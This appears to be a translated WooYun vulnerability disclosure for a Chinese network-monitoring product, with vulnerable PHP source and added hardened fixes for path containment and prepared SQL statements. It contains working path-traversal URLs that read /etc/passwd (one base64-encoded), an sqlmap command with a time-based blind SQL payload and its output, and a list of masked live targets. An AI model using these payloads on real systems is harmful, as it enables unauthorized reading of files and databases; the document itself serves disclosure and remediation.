Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0126977

Title: 中科新业 网络哨兵 (Network Sentinel): two arbitrary file reads and two SQL injections

Vendor: 中科新业

Author: 牛肉包子

Submitted: 2015-07-17 17:23

Fixed: 2015-10-15 16:26

Disclosed: 2015-10-15 16:26

Vulnerability type: sensitive information disclosure

Severity: high

Self-assessed Rank: 20

Status: handed to a third-party partner (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-07-17: Details sent to the vendor, awaiting vendor handling
2015-07-17: CNCERT (National Internet Emergency Center) could not yet reach the affected organization; details disclosed only to the reporting agency
2015-07-20: Details opened to third-party security partners
2015-09-10: Details disclosed to core white hats and domain experts
2015-09-20: Details disclosed to regular white hats
2015-09-30: Details disclosed to intern white hats
2015-10-15: Details disclosed to the public

Brief description:

No login required

Detailed description:

File read #1
Look at
include/get_file.php

<?php
@set_time_limit( 60 );
// The user-supplied path is passed straight to file_exists()/readfile() with no containment check
if ( isset( $_GET['view'] ) && file_exists( $_GET['view'] ) )
{
header( "Content-Type: application/octet-stream" );
header( "Content-Disposition: attachment; filename=".basename( $_GET['view'] ) );
readfile( $_GET['view'] );
}
else if ( isset( $_GET['view'] ) )
{
echo $_GET['view']." 不能读取!";
}
?>


Read it directly:

/ucenter/include/get_file.php?view=../../../../../../../etc/passwd


[Screenshot: QQ截图20150715165845.png]


Arbitrary file read #2
tjbb/webmail_raw.php

<?php
function _striptext( $document )
{
$search = array( "'<script[^>]*?>[^(document.getElementById)].*?</script>'si" );
$replace = array( "" );
$text = preg_replace( $search, $replace, $document );
return $text;
}
echo "<div align=\"center\" style=\"color:#FF0000;\" > <img border=\"0\" src=\"../images/bianmachange.gif\"/></div><hr size=\"1\" />";
// The path is only base64-decoded, never validated, before being read
$file = base64_decode( $_GET['path'] );
if ( file_exists( $file ) )
{
echo file_get_contents( $file );
}
else
{
echo "文件不存在";
}
?>


Just base64_encode the path:

/ucenter/tjbb/webmail_raw.php?path=Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==


[Screenshot: QQ截图20150715170155.png]


SQL injection
ucenter/admin/wsconfig.php
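Both file reads above share one defect: a caller-controlled path reaches file_exists() and the read call without being confined to a directory. The following resolver is an added example, not the vendor's code; the download root is an assumed location, and the same function would serve webmail_raw.php after its base64_decode().

```php
<?php
// Added example (not the vendor's code): a path-containment check for the
// get_file.php / webmail_raw.php pattern. DOWNLOAD_ROOT is an assumed directory.
define('DOWNLOAD_ROOT', '/var/www/ucenter/downloads');

/**
 * Resolve a user-supplied file name against DOWNLOAD_ROOT and return the
 * absolute path only if it stays inside that directory; otherwise return null.
 */
function resolve_download_path(string $userPath): ?string
{
    // Accept plain file names only: the vulnerable code accepted
    // "../../../../etc/passwd" (and its base64 form) verbatim.
    if ($userPath === '' || strpbrk($userPath, "/\\\0") !== false) {
        return null;
    }
    $root = realpath(DOWNLOAD_ROOT);
    $full = realpath(DOWNLOAD_ROOT . DIRECTORY_SEPARATOR . $userPath);
    if ($root === false || $full === false || !is_file($full)) {
        return null;
    }
    // realpath() has collapsed ".." and symlinks; the root must still be a prefix.
    if (strncmp($full, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Hardened equivalent of the download branch in get_file.php.
if (isset($_GET['view'])) {
    $path = resolve_download_path((string) $_GET['view']);
    if ($path === null) {
        http_response_code(404);
        exit('file not found');
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    readfile($path);
}
```

A request with view=../../../../../../../etc/passwd is rejected by the separator check before any filesystem call; a symlink inside the root pointing outside it is rejected by the realpath() prefix check.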

<?php
header( "Content-Type:text/html;charset=GB2312" );
session_start( );
include( "../include/globalvar.h" );
include( "../include/connectdb.php" );
include( "./authorize.php" );
include( "../include/printerror.php" );
include( "../include/addsystemlog.php" );
include( "../include/sendcmd.php" );
if ( $_GET['act'] == "Edt" )
{
$sql = "SELECT * FROM up_status_property WHERE id=".$_GET['id']; // injection 1
$gDb->query( $sql );
$gDb->next_record( );
$callbackurl = $gDb->Record['callbackurl'];
$verifyid = $gDb->Record['verifyid'];
$valid_time = $gDb->Record['valid_time'];
$valid_time = substr( $valid_time, 0, strpos( $valid_time, " " ) );
$actionurl = "wsconfig.php?act=Edt&id=".$_GET['id'];
}
else if ( $_GET['act'] == "Add" )
{
$html = "\t\t<tr>\n\t\t\t<td height=\"35\" align=\"right\" class=\"btd\">本地/远程:</td>\n\t\t\t<td class=\"btd\"><select name=\"local_or_remote\"><option value=\"0\">本地</option><option value=\"1\" selected>远程</option></select> <font color=\"#FF0000\">*</font></td>\n\t\t</tr>";
$actionurl = "wsconfig.php?act=Add";
}
if ( $_SERVER['REQUEST_METHOD'] == "POST" )
{
if ( $_GET['act'] == "Edt" )
{
$sql = "UPDATE up_status_property SET callbackurl='".$_POST['callbackurl']."', verifyid='".$_POST['verifyid']."', valid_time='".$_POST['valid_time']." 23:59:59"."' WHERE id=".$_GET['id']; // injection 2
$gDb->query( $sql );
printerror( "WEBSERVICE配置修改成功!", "sysinfo.php?kind=webservice" );
}
else if ( $_GET['act'] == "Add" )
{
$sql = "INSERT INTO up_status_property SET callbackurl='".$_POST['callbackurl']."', verifyid='".$_POST['verifyid']."', valid_time='".$_POST['valid_time']." 23:59:59"."', flag=".$_POST['local_or_remote'];
$gDb->query( $sql );
printerror( "WEBSERVICE配置添加成功!", "sysinfo.php?kind=webservice" );
}
}
echo "\n<LINK href=\"css/common.css\" type=\"text/css\" rel=\"stylesheet\">\n";
echo "<S";
echo "CRIPT LANGUAGE=\"JavaScript\" src=\"../include/common.js\"></SCRIPT>\n<form name=\"wsForm\" method=\"POST\" action=\"";
echo "\" onsubmit=\"return verifyInput();\">\n<table width=\"100%\" border=0>\n\t";
echo $html;
echo " <tr>\n\t\t<td height=\"40\" align=\"right\" class=\"btd\">授权码: </td>\n\t\t<td class=\"btd\"><input type=\"text\" name=\"verifyid\" value=\"";
echo $verifyid;
echo "\"> <font color=\"#FF0000\">*</font></td>\n\t</tr>\n\t<tr>\n\t\t<td height=\"40\" align=\"right\" class=\"btd\">有效期: </td>\n\t\t<td class=\"btd\"><input type='text' name='valid_time' onclick=\"onselectdate(this.form.valid_time);return false;\" readonly size=\"10\" value=\"";
echo $valid_time;
echo "\" class=\"bbox\" size=\"13\"> <font color=\"#FF0000\">*</font></td>\n\t</tr>\n\t<tr>\n\t\t<td height=\"85\" align=\"right\" class=\"btd\">回调地址: </td>\n\t\t<td class=\"btd\"><textarea name=\"callbackurl\" cols=\"50\" rows=\"4\">";
echo $callbackurl;
echo "</textarea> <font color=\"#FF0000\">*</font></td>\n\t</tr>\n\t<tr>\n\t\t<td height=\"40\" class=\"btd\"></td>\n\t\t<td>\n\t\t\t<input type=\"submit\" name=\"sub\" value=\"保 存\">\n\t\t\t<input type=\"button\" name=\"ret\" value=\"返 回\" onclick=\"window.location='sysinfo.php?kind=webservice'\"> \n\t\t</td>\n\t</tr>\n</table>\n</form>\n";
echo "<s";
echo "cript language=\"javascript\">\n<!--\nfunction verifyInput()\n{\n\tif(!killspace(document.wsForm.verifyid.value))\n\t{\n\t\talert(\"授权码不能为空!\");\n\t\tdocument.wsForm.verifyid.focus();\n\t\treturn false;\n\t}\n\tif(!killspace(document.wsForm.valid_time.value))\n\t{\n\t\talert(\"有效期不能为空!\");\n\t\tdocument.wsForm.valid_time.focus();\n\t\treturn false;\n\t}\n\tif(!killspace(document.wsForm.callbackurl.value))\n\t{\n\t\talert(\"回调地址不能为空!\");\n\t\tdocument.wsForm.callbackurl.focus();\n\t\treturn false;\n\t}\n}\n//-->\n</script>\n";
?>


sqlmap.py -u "**.**.**.**/ucenter/admin/addswitchmanage.php?act=E&id=1" -p "id" --dbs


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: act=E&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ToKi)
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
available databases [9]:
[*] `#mysql50#ucenter_08-12-26-17-21-57OURCE`
[*] cluster
[*] information_schema
[*] mysql
[*] ucenter
[*] ucenter_big_tables
[*] ucenter_gbk_bak
[*] ucenter_org
[*] ucenter_other_tables
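Both injection points in wsconfig.php come from concatenating $_GET['id'] and the POST fields into SQL strings. The rewrite below is an added example, not the vendor's code: it binds every value through PDO prepared statements and type-checks id before it is used; the DSN, credentials and column list are assumptions.

```php
<?php
// Added example (not the vendor's code): the "Edt" queries of wsconfig.php
// rewritten with PDO prepared statements. DSN and credentials are placeholders.
$pdo = new PDO('mysql:host=localhost;dbname=ucenter;charset=gbk', 'DB_USER', 'DB_PASS', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares, no client-side quoting
]);

// id is an integer key in the original WHERE clause, so reject anything else up front.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('bad id');
}

if (($_GET['act'] ?? '') === 'Edt') {
    // Injection point 1 in the original: "... WHERE id=" . $_GET['id']
    $stmt = $pdo->prepare(
        'SELECT callbackurl, verifyid, valid_time FROM up_status_property WHERE id = :id'
    );
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC); // false when no such id

    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        // Injection point 2 in the original: every POST field concatenated into the UPDATE.
        // valid_time is a date picked from a calendar widget, so enforce that shape.
        $validTime = (string) ($_POST['valid_time'] ?? '');
        if (!preg_match('/^\d{4}-\d{2}-\d{2}$/', $validTime)) {
            http_response_code(400);
            exit('bad valid_time');
        }
        $stmt = $pdo->prepare(
            'UPDATE up_status_property
                SET callbackurl = :cb, verifyid = :vid, valid_time = :vt
              WHERE id = :id'
        );
        $stmt->execute([
            ':cb'  => (string) ($_POST['callbackurl'] ?? ''),
            ':vid' => (string) ($_POST['verifyid'] ?? ''),
            ':vt'  => $validTime . ' 23:59:59',
            ':id'  => $id,
        ]);
    }
}
```

With emulated prepares disabled, the time-based payload sqlmap reported above is sent to MySQL as a bound integer parameter and fails the FILTER_VALIDATE_INT check before any query runs.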

Proof of vulnerability:

Cases

**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd

Fix recommendation:

[Screenshot: QQ截图20150715170815.png]

Copyright notice: when reposting, credit 牛肉包子@乌云


Vendor response

Vendor response:

Severity: high

Vulnerability Rank: 12

Confirmed: 2015-07-17 16:25

Vendor reply:

CNVD confirmed the reported situation and has notified the software vendor through the contact details published on its website.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-07-15 17:30 | 玉林嘎 ( regular white hat | Rank:798 vulns:99 )

    Where did the source code come from..

  2. 2015-07-15 17:54 | 牛肉包子 ( regular white hat | Rank:254 vulns:64 )

    @玉林嘎 Small vendor, not digging any further.

  3. 2015-07-15 18:02 | menmen519 ( regular white hat | Rank:764 vulns:147 | http://menmen519.blog.sohu.com/)

    Little by little it adds up and you make the front page

  4. 2015-07-15 18:06 | 牛肉包子 ( regular white hat | Rank:254 vulns:64 )

    @menmen519 Did those few of yours make the front page?

  5. 2015-07-15 18:07 | menmen519 ( regular white hat | Rank:764 vulns:147 | http://menmen519.blog.sohu.com/)

    @牛肉包子 I think two of them did. This one isn't interesting, so I stopped digging; these crude, simple bugs will make you dumb.

  6. 2015-07-15 18:14 | 牛肉包子 ( regular white hat | Rank:254 vulns:64 )

    @menmen519 23333 By the way, why does my command execution not work at all 0.0